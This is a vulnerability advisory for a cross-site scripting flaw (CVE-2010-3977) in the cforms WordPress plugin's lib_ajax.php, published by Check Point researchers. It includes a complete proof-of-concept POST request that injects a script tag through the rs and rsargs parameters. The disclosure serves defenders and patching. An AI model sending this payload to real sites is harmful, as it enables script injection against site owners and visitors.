cforms WordPress Plugin Cross Site Scripting Vulnerability

2010.11.04
Credit: Rodrigo Branco
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2010-3977
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Dear List, I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ cforms WordPress Plugin Cross Site Scripting Vulnerability CVE-2010-3977 INTRODUCTION According to Delicious Days, "cforms is a powerful and feature rich form plugin for WordPress, offering convenient deployment of multiple Ajax driven contact forms throughout your blog or even on the same page." This problem was confirmed in the following versions of the cforms WordPress Plugin, other versions maybe also affected. cforms v11.5 CVSS Scoring System The CVSS score is: 5.5 Base Score: 6.7 Temporal Score: 5.5 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N Temporal score is: E:F/RL:OF/RC:C DETAILS A data array is created in lib_ajax.php using values from a form field in a POST request. The parameters rs and rsargs are not validated and thus it is possible to inject code. Request: http://<server>/wp-content/plugins/cforms/lib_ajax.php POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1 Host: <server> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv: 1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 219 Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do %26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce %26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do %26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765; c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ; comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam %40checkpoint.com Pragma: no-cache Cache-Control: no-cache rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$# $<script>alert(1)</script>$#$rbranco_nospam (at) checkpoint (dot) com [email concealed]$#$http:// www.checkpoint.com$#$<script>alert(1)</script> CREDITS This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT). Best Regards, Rodrigo. -- Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies

References:

http://www.securityfocus.com/bid/44587
http://www.securityfocus.com/archive/1/archive/1/514579/100/0/threaded
http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/
http://secunia.com/advisories/42006


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top